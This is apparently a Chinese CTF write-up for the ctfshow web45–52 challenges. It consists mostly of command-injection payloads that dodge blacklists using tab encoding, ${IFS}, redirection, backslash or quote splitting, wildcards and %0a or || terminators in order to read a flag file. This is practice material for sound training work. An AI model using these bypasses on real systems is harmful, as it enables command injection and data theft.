web45-52

渗透安全

web45

开启容器

过滤了空格

空格绕过方法

1
2
3
4
5
%09
${IFS}
${IFS}$9
<
****

payload:
/?c=tac${IFS}fla?.php||ls

其他方法

1
2
3
?c=nl%09fl*%0a
?c=nl<fla\g.php%0a
?c=echo${IFS}`nl${IFS}fl*`%0a		// 反引号表示无回显的命令执行,常配合echo来打印输出

web46

开启容器

数字也被禁用

空格绕过方法

1
2
3
4
5
%09
${IFS}
${IFS}$9
<
****

还剩下<

用\绕过过滤,
nl%3Cfla\g.php%0a

其他payload

1
2
3
?c=nl%09????.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla''g.php%0a

web47

开启容器

1
nl<fla''g.php||

其实跟上题payload一样

1
2
3
4
5
6
?c=nl<fla''g.php||
?c=nl%09????.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla''g.php%0a
?c=nl<fla*%0a
?c=nl<fla\g.php%0a

web48

开启容器

过滤了更多

?c=nl<fla\g.php%0a

1
2
3
4
5
6

?c=nl%09????.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla''g.php%0a
?c=nl<fla\g.php%0a

web49

开启容器

好像就多了%

1
2
?c=nl<fla\g.php%0a
?c=nl<fla''g.php||

web50

开启容器

\x09与\x26的含义其实就是%09(tab键)和%26(&)
同样可以使用上题的payload

1
2
?c=nl<fla\g.php%0a
?c=nl<fla''g.php||

web51

开启容器

多了个tac,但依然不影响

1
2
?c=nl<fla\g.php%0a
?c=nl<fla''g.php||

web52

开启容器

><过滤掉了,但是$可以用

1
2
3
?c=nl${IFS}fla''g.php||
?c=nl$IFS/fla''g||